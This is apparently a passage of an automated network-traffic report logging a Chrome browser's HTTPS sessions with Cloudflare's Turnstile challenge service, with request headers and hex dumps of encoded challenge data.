                                                                                                        CF-Chl-RetryAttempt: 1
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/0zt9v/0x4AAAAAAA0H1DSPEE75_Afo/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:23 UTC16384OUTData Raw: 76 5f 38 66 34 30 66 63 65 37 30 64 32 62 34 33 63 31 3d 37 45 71 6d 50 61 4d 64 39 79 45 4d 39 78 64 4d 38 55 56 55 5a 78 66 4d 73 55 53 6d 48 70 4d 66 4d 47 55 61 63 6d 71 4d 64 4d 4b 55 51 33 61 78 64 4d 4a 55 72 58 70 79 48 4d 59 4d 66 55 79 4e 55 53 24 55 58 6d 75 66 66 66 31 61 55 61 51 55 54 6e 52 62 33 55 48 33 55 4a 55 78 33 61 79 55 52 33 53 49 4a 51 63 55 55 6e 55 57 31 39 55 4a 52 79 55 55 64 55 37 50 6a 53 4a 55 4d 54 36 38 39 50 7a 24 49 48 4c 6a 69 53 37 4d 55 55 79 52 55 4d 2d 66 4d 58 59 55 53 49 55 64 70 39 55 61 73 24 55 31 69 61 70 6b 33 55 47 55 75 54 45 59 58 50 45 30 67 31 31 42 63 32 71 6b 71 59 35 71 50 4b 24 6d 75 49 54 78 53 4e 35 75 53 54 71 6b 63 6d 42 7a 53 70 32 42 38 52 46 54 39 43 43 6d 66 4c 42 46 6f 24 51 35 2d 56 65 24
                                                                                                        Data Ascii: v_8f40fce70d2b43c1=7EqmPaMd9yEM9xdM8UVUZxfMsUSmHpMfMGUacmqMdMKUQ3axdMJUrXpyHMYMfUyNUS$UXmufff1aUaQUTnRb3UH3UJUx3ayUR3SIJQcUUnUW19UJRyUUdU7PjSJUMT689Pz$IHLjiS7MUUyRUM-fMXYUSIUdp9Uas$U1iapk3UGUuTEYXPE0g11Bc2qkqY5qPK$muITxSN5uSTqkcmBzSp2B8RFT9CCmfLBFo$Q5-Ve$
                                                                                                        2024-12-18 17:49:23 UTC15387OUTData Raw: 51 4a 61 33 55 7a 61 77 67 36 66 34 6d 42 68 6a 77 6b 6c 4d 33 4d 72 55 32 55 41 55 4d 62 4d 49 55 77 48 4d 71 4d 52 55 58 6d 75 4c 37 6e 6d 52 6d 55 45 55 79 33 74 55 79 66 48 39 55 4a 67 55 66 55 58 55 48 33 66 70 55 4b 55 7a 42 79 54 4d 4c 55 56 33 78 34 55 46 55 55 70 79 48 4d 47 33 66 70 53 55 4d 56 55 4d 70 61 64 55 74 55 7a 6d 75 38 59 4a 55 71 4d 74 54 6d 7a 68 37 39 78 49 55 4c 55 67 55 4d 4b 4b 24 77 52 6d 44 24 55 6c 65 7a 72 75 70 4e 52 55 2d 56 31 72 53 44 56 44 55 55 72 55 5a 70 58 6d 48 49 72 66 54 77 6d 4d 62 4d 59 72 38 44 53 30 78 4e 55 63 54 66 7a 2d 4d 55 4a 38 55 45 53 63 6d 67 55 4d 39 55 52 55 55 62 55 71 53 31 68 6c 42 47 38 39 78 55 75 39 75 66 55 68 55 7a 6d 53 65 4d 7a 51 55 6d 75 45 4d 47 33 54 68 30 68 4f 75 68 77 68 65 33 4d
                                                                                                        Data Ascii: QJa3Uzawg6f4mBhjwklM3MrU2UAUMbMIUwHMqMRUXmuL7nmRmUEUy3tUyfH9UJgUfUXUH3fpUKUzByTMLUV3x4UFUUpyHMG3fpSUMVUMpadUtUzmu8YJUqMtTmzh79xIULUgUMKK$wRmD$UlezrupNRU-V1rSDVDUUrUZpXmHIrfTwmMbMYr8DS0xNUcTfz-MUJ8UEScmgUM9URUUbUqS1hlBG89xUu9ufUhUzmSeMzQUmuEMG3Th0hOuhwhe3M
                                                                                                        2024-12-18 17:49:24 UTC330INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 17:49:24 GMT
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Content-Length: 26264
                                                                                                        Connection: close
                                                                                                        cf-chl-gen: 9v5a0i+vbHHs4fz8WwL0PCAIJP0McnYrPH8wfCb8tvOMWHa1XZP3PEGzXa76vNh8LrIyEA3K2H7/9cQd$YzHhH3si7FTYboCx
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f40fd40fde61819-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 17:49:24 UTC1039INData Raw: 5a 48 64 47 6a 55 69 52 69 4a 46 6f 63 4a 43 58 61 70 42 61 61 31 69 50 6c 6f 6d 57 63 33 69 4e 6d 6e 65 45 6e 70 31 37 71 71 61 6d 69 49 79 4c 68 59 4b 74 68 5a 56 75 71 57 36 68 6d 4b 4f 73 70 33 32 31 65 62 47 69 73 70 2b 78 76 4b 36 64 75 34 4f 42 6e 48 37 41 76 38 75 65 71 73 69 77 69 72 2b 67 70 74 4b 78 6c 35 57 35 6c 62 66 41 74 39 71 63 6e 73 4f 38 74 73 43 39 32 4b 48 6e 36 61 6a 6f 36 4e 37 68 38 2b 6d 79 7a 4f 76 52 78 62 48 49 79 63 7a 4e 30 37 6a 70 30 50 33 73 35 4e 50 66 41 75 6a 2b 43 73 6e 4b 79 73 58 74 43 75 7a 4b 38 66 37 68 34 2b 45 47 2b 75 6a 70 7a 68 73 53 47 42 41 64 46 50 7a 78 2b 4f 45 55 2f 42 30 5a 43 41 55 43 47 68 38 75 49 68 30 67 42 44 59 31 4c 77 67 70 47 79 77 4e 47 54 74 41 48 66 30 54 2b 54 73 56 4e 53 49 6c 49 7a 73
                                                                                                        Data Ascii: ZHdGjUiRiJFocJCXapBaa1iPlomWc3iNmneEnp17qqamiIyLhYKthZVuqW6hmKOsp321ebGisp+xvK6du4OBnH7Av8ueqsiwir+gptKxl5W5lbfAt9qcnsO8tsC92KHn6ajo6N7h8+myzOvRxbHIyczN07jp0P3s5NPfAuj+CsnKysXtCuzK8f7h4+EG+ujpzhsSGBAdFPzx+OEU/B0ZCAUCGh8uIh0gBDY1LwgpGywNGTtAHf0T+TsVNSIlIzs
                                                                                                        2024-12-18 17:49:24 UTC1369INData Raw: 4b 65 6e 70 2b 6a 34 64 2b 62 70 71 4f 58 35 68 69 6c 32 61 43 70 70 68 6e 66 33 64 72 63 4a 6d 4b 66 33 31 76 74 72 46 75 6b 61 69 61 71 36 71 55 72 35 68 2f 6e 37 4b 51 75 59 2b 30 6b 37 6d 44 7a 4d 32 2b 7a 62 32 4b 69 73 79 4b 73 70 48 42 75 4b 6d 6d 70 74 76 64 79 74 66 58 30 37 2f 4f 76 62 75 65 76 37 71 36 36 71 72 69 70 61 58 61 7a 61 6a 64 33 4f 76 6b 37 73 4b 79 2b 66 6e 73 31 74 58 70 33 63 2f 57 37 51 4f 2b 42 51 50 67 33 41 4c 36 33 2b 55 43 77 77 72 71 79 67 72 6c 35 64 2f 74 31 42 67 49 46 77 50 73 47 68 55 57 45 78 4d 55 2b 74 34 4f 35 41 41 61 33 68 34 6e 4b 69 66 34 49 50 6a 34 42 42 34 44 46 53 2f 76 39 53 51 6d 48 43 73 48 43 6a 33 33 46 6a 67 54 4d 50 77 6e 48 6a 67 6e 49 42 63 37 54 53 59 47 49 68 38 70 55 46 55 30 4b 44 5a 4d 4c 68
                                                                                                        Data Ascii: Kenp+j4d+bpqOX5hil2aCpphnf3drcJmKf31vtrFukaiaq6qUr5h/n7KQuY+0k7mDzM2+zb2KisyKspHBuKmmptvdytfX07/Ovbuev7q66qripaXazajd3Ovk7sKy+fns1tXp3c/W7QO+BQPg3AL63+UCwwrqygrl5d/t1BgIFwPsGhUWExMU+t4O5AAa3h4nKif4IPj4BB4DFS/v9SQmHCsHCj33FjgTMPwnHjgnIBc7TSYGIh8pUFU0KDZMLh
                                                                                                        2024-12-18 17:49:24 UTC1369INData Raw: 61 59 74 72 65 58 68 68 59 59 52 79 67 35 56 6c 65 36 75 75 68 35 36 75 69 49 69 48 6a 36 79 44 69 4c 52 33 6c 33 65 78 64 5a 69 5a 6c 49 32 63 67 4c 65 53 6e 73 4c 42 6d 4b 57 4c 6a 4a 79 65 71 36 65 76 70 4b 47 71 30 39 54 59 6c 71 57 74 32 71 75 78 30 4c 72 41 77 72 65 2f 72 74 4c 41 70 4d 66 43 76 63 57 70 70 73 54 71 30 50 4b 73 37 2f 48 67 36 4e 6a 30 31 4e 4c 72 33 73 33 74 77 4f 45 45 77 4c 2f 45 41 2b 45 4b 77 64 6d 2b 77 38 58 4e 2f 51 50 6e 30 52 45 43 31 42 6e 34 45 2b 63 64 36 76 66 65 38 52 44 63 45 50 6e 75 37 52 4c 64 41 75 54 6b 2f 53 37 6b 45 41 30 65 4d 51 2f 6c 4a 43 51 49 41 68 48 30 44 41 55 38 4f 54 6f 55 45 44 34 2b 2f 42 49 6a 49 53 63 66 41 44 73 48 48 30 41 48 48 52 45 71 43 79 6f 6f 4a 6b 6f 7a 51 56 63 6c 4b 51 39 59 56 42 38
                                                                                                        Data Ascii: aYtreXhhYYRyg5Vle6uuh56uiIiHj6yDiLR3l3exdZiZlI2cgLeSnsLBmKWLjJyeq6evpKGq09TYlqWt2qux0LrAwre/rtLApMfCvcWppsTq0PKs7/Hg6Nj01NLr3s3twOEEwL/EA+EKwdm+w8XN/QPn0REC1Bn4E+cd6vfe8RDcEPnu7RLdAuTk/S7kEA0eMQ/lJCQIAhH0DAU8OToUED4+/BIjIScfADsHH0AHHREqCyooJkozQVclKQ9YVB8
                                                                                                        2024-12-18 17:49:24 UTC1369INData Raw: 48 43 55 67 34 47 41 69 59 36 67 61 59 65 76 71 4b 65 43 61 4a 61 5a 6b 58 71 71 69 72 32 77 66 4c 36 63 6c 63 4f 30 6e 61 65 41 67 4b 62 44 67 73 72 4b 71 38 6d 34 6b 63 58 51 71 4a 57 6d 6c 38 71 53 6c 74 58 56 32 5a 58 56 79 62 33 56 6e 38 44 41 30 72 54 6d 31 38 75 7a 74 4d 69 75 75 72 6e 62 77 75 54 75 33 61 6a 55 30 63 2f 6d 78 38 72 4c 35 37 58 65 36 76 44 65 2b 66 51 46 41 67 48 62 2b 2b 58 72 42 67 37 6c 32 41 2f 69 41 76 33 77 7a 74 2f 33 42 52 67 62 44 68 2f 79 36 78 41 62 41 75 30 58 48 68 6b 57 34 43 72 71 47 4f 59 46 4c 69 41 65 36 75 6e 6c 4b 69 34 4b 46 52 49 5a 4f 77 73 62 43 52 51 49 48 52 67 31 4c 42 38 44 46 69 41 53 50 50 77 37 51 51 31 45 52 7a 73 61 54 67 6f 6c 54 6a 64 53 4e 45 49 38 4f 6b 74 54 48 6a 4a 4b 4b 79 39 57 4d 31 4a 52
                                                                                                        Data Ascii: HCUg4GAiY6gaYevqKeCaJaZkXqqir2wfL6clcO0naeAgKbDgsrKq8m4kcXQqJWml8qSltXV2ZXVyb3Vn8DA0rTm18uztMiuurnbwuTu3ajU0c/mx8rL57Xe6vDe+fQFAgHb++XrBg7l2A/iAv3wzt/3BRgbDh/y6xAbAu0XHhkW4CrqGOYFLiAe6unlKi4KFRIZOwsbCRQIHRg1LB8DFiASPPw7QQ1ERzsaTgolTjdSNEI8OktTHjJKKy9WM1JR
                                                                                                        2024-12-18 17:49:24 UTC1369INData Raw: 69 77 65 59 52 79 62 59 4a 77 63 71 61 34 69 4b 53 61 75 70 4b 2f 65 61 47 2b 69 71 32 2b 67 4c 32 63 75 4d 4f 45 6e 35 62 48 79 71 58 41 6b 4a 47 6f 79 4e 62 57 30 39 6e 5a 73 4e 43 6d 79 61 6e 48 31 4e 54 68 30 71 37 57 78 4b 48 6e 70 61 72 6c 35 72 36 39 77 38 76 44 75 73 58 76 79 75 7a 6c 39 63 72 6f 79 39 62 65 33 41 47 39 33 67 51 44 30 75 33 64 32 74 37 35 36 4e 54 71 79 41 44 2b 7a 65 45 43 30 74 54 6b 39 42 6e 76 42 2b 58 54 38 42 4d 5a 32 2f 58 66 45 39 6f 50 4a 79 54 68 36 4e 38 69 4b 53 6f 4a 42 65 45 48 48 79 2f 74 39 41 33 78 39 76 67 6e 4f 50 6e 38 46 54 4e 42 46 68 6a 34 2f 6a 41 76 52 51 59 7a 52 79 6f 44 53 54 38 2f 55 45 77 49 50 67 30 72 56 79 42 58 52 55 38 31 47 30 63 74 56 57 42 4e 49 46 73 65 55 55 38 31 49 6c 4e 62 5a 47 74 5a 4a
                                                                                                        Data Ascii: iweYRybYJwcqa4iKSaupK/eaG+iq2+gL2cuMOEn5bHyqXAkJGoyNbW09nZsNCmyanH1NTh0q7WxKHnparl5r69w8vDusXvyuzl9croy9be3AG93gQD0u3d2t756NTqyAD+zeEC0tTk9BnvB+XT8BMZ2/XfE9oPJyTh6N8iKSoJBeEHHy/t9A3x9vgnOPn8FTNBFhj4/jAvRQYzRyoDST8/UEwIPg0rVyBXRU81G0ctVWBNIFseUU81IlNbZGtZJ
                                                                                                        2024-12-18 17:49:24 UTC1369INData Raw: 6a 6f 32 32 4f 6d 59 61 4b 6c 70 46 37 6c 4d 47 4d 66 4a 62 45 6d 59 47 63 74 36 47 47 6e 37 79 68 71 71 57 61 69 4d 36 46 72 73 71 54 6c 49 37 4f 79 70 61 4f 71 4e 47 78 7a 4a 66 66 6e 70 61 30 30 61 54 55 30 2b 47 6f 74 61 4f 74 71 39 37 4a 33 63 50 31 36 37 44 4c 7a 2b 50 33 79 2f 33 72 74 38 7a 4c 38 77 50 54 42 4e 33 42 32 75 4c 48 78 73 59 4a 42 77 44 67 36 67 63 49 7a 39 54 4c 30 4e 49 57 45 78 54 4e 39 64 50 64 32 77 2f 35 44 76 4d 6d 48 4f 44 37 41 42 51 6f 2b 79 34 63 35 2f 7a 37 4a 44 4d 45 4e 41 37 78 43 78 50 33 39 67 34 70 4b 7a 54 36 50 52 59 32 2f 76 59 64 4d 76 6c 47 4a 6a 67 43 49 79 34 62 48 79 73 6d 45 43 6c 57 49 52 45 72 57 53 34 57 4d 55 77 32 47 7a 52 52 4e 6a 38 36 4c 78 31 6a 47 6c 51 67 58 53 70 74 59 32 51 73 4d 53 67 74 4d 58
                                                                                                        Data Ascii: jo22OmYaKlpF7lMGMfJbEmYGct6GGn7yhqqWaiM6FrsqTlI7OypaOqNGxzJffnpa00aTU0+GotaOtq97J3cP167DLz+P3y/3rt8zL8wPTBN3B2uLHxsYJBwDg6gcIz9TL0NIWExTN9dPd2w/5DvMmHOD7ABQo+y4c5/z7JDMENA7xCxP39g4pKzT6PRY2/vYdMvlGJjgCIy4bHysmEClWIRErWS4WMUw2GzRRNj86Lx1jGlQgXSptY2QsMSgtMX
                                                                                                        2024-12-18 17:49:24 UTC1369INData Raw: 75 4a 43 31 65 35 61 4d 73 58 36 78 70 4c 61 45 78 4c 36 33 68 59 79 44 76 6f 71 37 6a 38 4b 54 77 4b 7a 47 6b 71 36 6b 79 5a 61 63 6b 39 43 5a 33 4c 43 61 6e 71 53 66 30 71 47 61 34 74 61 6c 6e 72 7a 67 71 73 66 51 34 36 37 4b 30 4f 57 78 35 4f 37 6d 75 50 6a 55 37 72 2f 73 32 50 6d 2b 74 74 54 34 77 76 54 67 39 63 59 4a 34 4d 62 4c 35 75 6a 2b 30 42 48 67 43 64 49 46 44 77 72 57 43 76 77 52 32 2f 58 62 44 39 37 35 32 78 4c 69 2f 76 51 62 36 78 6b 4a 47 2b 6f 73 35 79 4c 74 39 50 4d 75 38 6a 55 46 38 76 63 53 38 79 37 36 4c 52 30 76 2f 76 59 37 4e 67 49 32 4b 54 59 48 4f 55 63 36 43 6b 30 64 51 78 46 52 4a 55 38 59 52 54 46 4a 46 6c 67 59 55 42 77 33 50 55 34 65 55 6b 56 53 4a 44 38 35 58 43 63 66 4f 56 30 73 52 69 77 72 4c 6e 46 46 5a 44 56 30 4e 48 49
                                                                                                        Data Ascii: uJC1e5aMsX6xpLaExL63hYyDvoq7j8KTwKzGkq6kyZack9CZ3LCanqSf0qGa4talnrzgqsfQ467K0OWx5O7muPjU7r/s2Pm+ttT4wvTg9cYJ4MbL5uj+0BHgCdIFDwrWCvwR2/XbD9752xLi/vQb6xkJG+os5yLt9PMu8jUF8vcS8y76LR0v/vY7NgI2KTYHOUc6Ck0dQxFRJU8YRTFJFlgYUBw3PU4eUkVSJD85XCcfOV0sRiwrLnFFZDV0NHI
                                                                                                        2024-12-18 17:49:24 UTC1369INData Raw: 58 2b 30 6f 49 4b 55 66 71 69 37 66 62 71 33 77 49 47 70 76 6f 71 4f 30 4c 43 54 6f 4e 69 30 6c 71 69 53 76 4d 2b 61 6c 74 71 61 71 39 44 46 31 35 6e 42 31 71 4b 35 36 4b 7a 50 75 4b 62 6a 79 72 48 7a 36 38 58 44 7a 72 6a 62 72 66 6e 32 74 73 79 79 34 65 44 44 33 65 37 36 31 50 58 6c 35 38 66 37 44 38 62 65 35 76 45 45 78 65 30 54 7a 75 58 76 45 39 4c 70 7a 76 30 48 33 2f 6b 62 46 2f 45 53 41 67 6a 6a 47 50 54 69 39 77 4d 4f 49 4f 45 4b 49 2b 72 37 49 69 77 72 42 51 45 37 4b 67 55 35 48 6a 44 78 47 67 33 36 45 51 31 48 4e 68 46 47 51 77 4d 5a 46 55 38 2f 47 55 30 79 52 41 59 75 53 77 38 6c 49 56 74 4c 4a 56 70 58 46 79 30 70 59 31 51 74 59 55 5a 59 47 6b 4a 6a 49 7a 6b 31 62 32 41 35 62 6d 73 72 51 54 31 33 61 55 46 31 57 6d 77 75 56 6e 73 33 54 55 6d 44
                                                                                                        Data Ascii: X+0oIKUfqi7fbq3wIGpvoqO0LCToNi0lqiSvM+altqaq9DF15nB1qK56KzPuKbjyrHz68XDzrjbrfn2tsyy4eDD3e761PXl58f7D8be5vEExe0TzuXvE9Lpzv0H3/kbF/ESAgjjGPTi9wMOIOEKI+r7IiwrBQE7KgU5HjDxGg36EQ1HNhFGQwMZFU8/GU0yRAYuSw8lIVtLJVpXFy0pY1QtYUZYGkJjIzk1b2A5bmsrQT13aUF1WmwuVns3TUmD


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        24192.168.2.749854104.18.94.414439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:25 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2000292729:1734542240:X0lCKVmzbenQfrsiKz-FVaH0wGrZC2Dr08uWAScPXbQ/8f40fce70d2b43c1/V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:26 UTC379INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 18 Dec 2024 17:49:26 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        cf-chl-out: ix8f7ece7SBl6R0jjyjNureMySGTf+mvnWA=$kT9Vo2WVlfCjD/nn
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f40fd4eed204406-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 17:49:26 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        25192.168.2.750035104.18.95.414439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:51:20 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2000292729:1734542240:X0lCKVmzbenQfrsiKz-FVaH0wGrZC2Dr08uWAScPXbQ/8f40fce70d2b43c1/V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 34154
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        CF-Chl-RetryAttempt: 1
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/0zt9v/0x4AAAAAAA0H1DSPEE75_Afo/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:51:20 UTC16384OUTData Raw: 76 5f 38 66 34 30 66 63 65 37 30 64 32 62 34 33 63 31 3d 37 45 71 6d 50 61 4d 64 39 79 45 4d 39 78 64 4d 38 55 56 55 5a 78 66 4d 73 55 53 6d 48 70 4d 66 4d 47 55 61 63 6d 71 4d 64 4d 4b 55 51 33 61 78 64 4d 4a 55 72 58 70 79 48 4d 59 4d 66 55 79 4e 55 53 24 55 58 6d 75 66 66 66 31 61 55 61 51 55 54 6e 52 62 33 55 48 33 55 4a 55 78 33 61 79 55 52 33 53 49 4a 51 63 55 55 6e 55 57 31 39 55 4a 52 79 55 55 64 55 37 50 6a 53 4a 55 4d 54 36 38 39 50 7a 24 49 48 4c 6a 69 53 37 4d 55 55 79 52 55 4d 2d 66 4d 58 59 55 53 49 55 64 70 39 55 61 73 24 55 31 69 61 70 6b 33 55 47 55 75 54 45 59 58 50 45 30 67 31 31 42 63 32 71 6b 71 59 35 71 50 4b 24 6d 75 49 54 78 53 4e 35 75 53 54 71 6b 63 6d 42 7a 53 70 32 42 38 52 46 54 39 43 43 6d 66 4c 42 46 6f 24 51 35 2d 56 65 24
                                                                                                        Data Ascii: v_8f40fce70d2b43c1=7EqmPaMd9yEM9xdM8UVUZxfMsUSmHpMfMGUacmqMdMKUQ3axdMJUrXpyHMYMfUyNUS$UXmufff1aUaQUTnRb3UH3UJUx3ayUR3SIJQcUUnUW19UJRyUUdU7PjSJUMT689Pz$IHLjiS7MUUyRUM-fMXYUSIUdp9Uas$U1iapk3UGUuTEYXPE0g11Bc2qkqY5qPK$muITxSN5uSTqkcmBzSp2B8RFT9CCmfLBFo$Q5-Ve$
                                                                                                        2024-12-18 17:51:20 UTC16384OUTData Raw: 51 4a 61 33 55 7a 61 77 67 36 66 34 6d 42 68 6a 77 6b 6c 4d 33 4d 72 55 32 55 41 55 4d 62 4d 49 55 77 48 4d 71 4d 52 55 58 6d 75 4c 37 6e 6d 52 6d 55 45 55 79 33 74 55 79 66 48 39 55 4a 67 55 66 55 58 55 48 33 66 70 55 4b 55 7a 42 79 54 4d 4c 55 56 33 78 34 55 46 55 55 70 79 48 4d 47 33 66 70 53 55 4d 56 55 4d 70 61 64 55 74 55 7a 6d 75 38 59 4a 55 71 4d 74 54 6d 7a 68 37 39 78 49 55 4c 55 67 55 4d 4b 4b 24 77 52 6d 44 24 55 6c 65 7a 72 75 70 4e 52 55 2d 56 31 72 53 44 56 44 55 55 72 55 5a 70 58 6d 48 49 72 66 54 77 6d 4d 62 4d 59 72 38 44 53 30 78 4e 55 63 54 66 7a 2d 4d 55 4a 38 55 45 53 63 6d 67 55 4d 39 55 52 55 55 62 55 71 53 31 68 6c 42 47 38 39 78 55 75 39 75 66 55 68 55 7a 6d 53 65 4d 7a 51 55 6d 75 45 4d 47 33 54 68 30 68 4f 75 68 77 68 65 33 4d
                                                                                                        Data Ascii: QJa3Uzawg6f4mBhjwklM3MrU2UAUMbMIUwHMqMRUXmuL7nmRmUEUy3tUyfH9UJgUfUXUH3fpUKUzByTMLUV3x4UFUUpyHMG3fpSUMVUMpadUtUzmu8YJUqMtTmzh79xIULUgUMKK$wRmD$UlezrupNRU-V1rSDVDUUrUZpXmHIrfTwmMbMYr8DS0xNUcTfz-MUJ8UEScmgUM9URUUbUqS1hlBG89xUu9ufUhUzmSeMzQUmuEMG3Th0hOuhwhe3M
                                                                                                        2024-12-18 17:51:20 UTC1386OUTData Raw: 35 72 69 61 55 77 72 66 55 44 55 75 38 39 6f 36 52 70 79 6f 55 41 55 51 69 44 66 55 38 45 54 70 4d 70 4d 52 49 58 6d 53 47 33 61 55 58 6d 66 7a 4e 63 6d 58 6d 79 44 61 51 6d 4d 55 53 62 55 4f 52 6d 6d 53 36 4d 49 46 24 70 79 41 41 48 71 63 31 4d 59 52 49 72 45 6b 69 32 61 72 55 67 4c 75 4e 73 34 44 50 7a 2b 46 43 6b 55 53 6d 75 6f 6d 32 56 57 45 74 34 6a 58 6f 77 33 75 45 4d 42 63 6d 39 48 48 55 52 55 61 24 2d 31 4d 50 6d 38 33 71 52 44 6b 33 57 55 79 6f 4d 4d 55 77 4c 43 49 55 4e 50 5a 4a 2b 70 52 51 41 6e 53 72 44 6a 5a 6d 6a 67 6f 32 55 4d 24 30 70 49 42 52 24 33 4d 24 61 78 71 64 55 53 6d 53 33 4d 48 50 6f 55 78 78 44 2b 67 42 4c 69 51 72 39 66 43 70 61 67 61 4b 48 30 72 67 6d 55 52 55 52 51 36 54 4a 34 55 51 70 61 39 55 70 55 38 45 75 67 74 45 44 44
                                                                                                        Data Ascii: 5riaUwrfUDUu89o6RpyoUAUQiDfU8ETpMpMRIXmSG3aUXmfzNcmXmyDaQmMUSbUORmmS6MIF$pyAAHqc1MYRIrEki2arUgLuNs4DPz+FCkUSmuom2VWEt4jXow3uEMBcm9HHURUa$-1MPm83qRDk3WUyoMMUwLCIUNPZJ+pRQAnSrDjZmjgo2UM$0pIBR$3M$axqdUSmS3MHPoUxxD+gBLiQr9fCpagaKH0rgmURURQ6TJ4UQpa9UpU8EugtEDD
                                                                                                        2024-12-18 17:51:21 UTC135INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 17:51:21 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Content-Length: 4472
                                                                                                        Connection: close
                                                                                                        2024-12-18 17:51:21 UTC1494INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 49 49 69 5a 64 69 44 67 45 70 43 37 76 63 35 47 39 75 54 72 79 7a 31 2f 6f 61 69 65 68 48 45 6a 39 73 77 53 56 34 61 64 41 71 54 61 44 6b 6a 6a 6f 63 4b 58 48 4b 73 50 7a 74 47 37 37 77 61 45 63 61 63 70 31 38 74 72 6b 4e 78 52 64 42 4a 31 48 64 57 54 70 43 43 33 68 77 61 35 6b 45 78 6d 42 54 33 65 48 4c 52 62 65 6d 56 55 47 62 2b 54 68 66 79 30 6f 76 2b 49 7a 2b 52 78 53 2f 35 64 73 66 55 79 67 6d 74 76 7a 5a 72 5a 74 6f 43 68 59 31 37 39 49 30 51 4d 6a 6d 38 59 47 55 67 35 70 7a 39 39 5a 52 4e 34 6c 4a 6e 66 76 7a 6b 44 63 71 6e 6d 31 66 68 45 48 55 58 61 58 2f 30 4e 45 61 52 42 54 58 6e 4e 69 73 5a 49 51 36 6e 6b 51 79 79 78 58 55 62 50 78 71 67 6f 53 31 5a 45 43 36 4d 79 4f 77 6b 69 41 43 36 35 68 74 2b 78 64
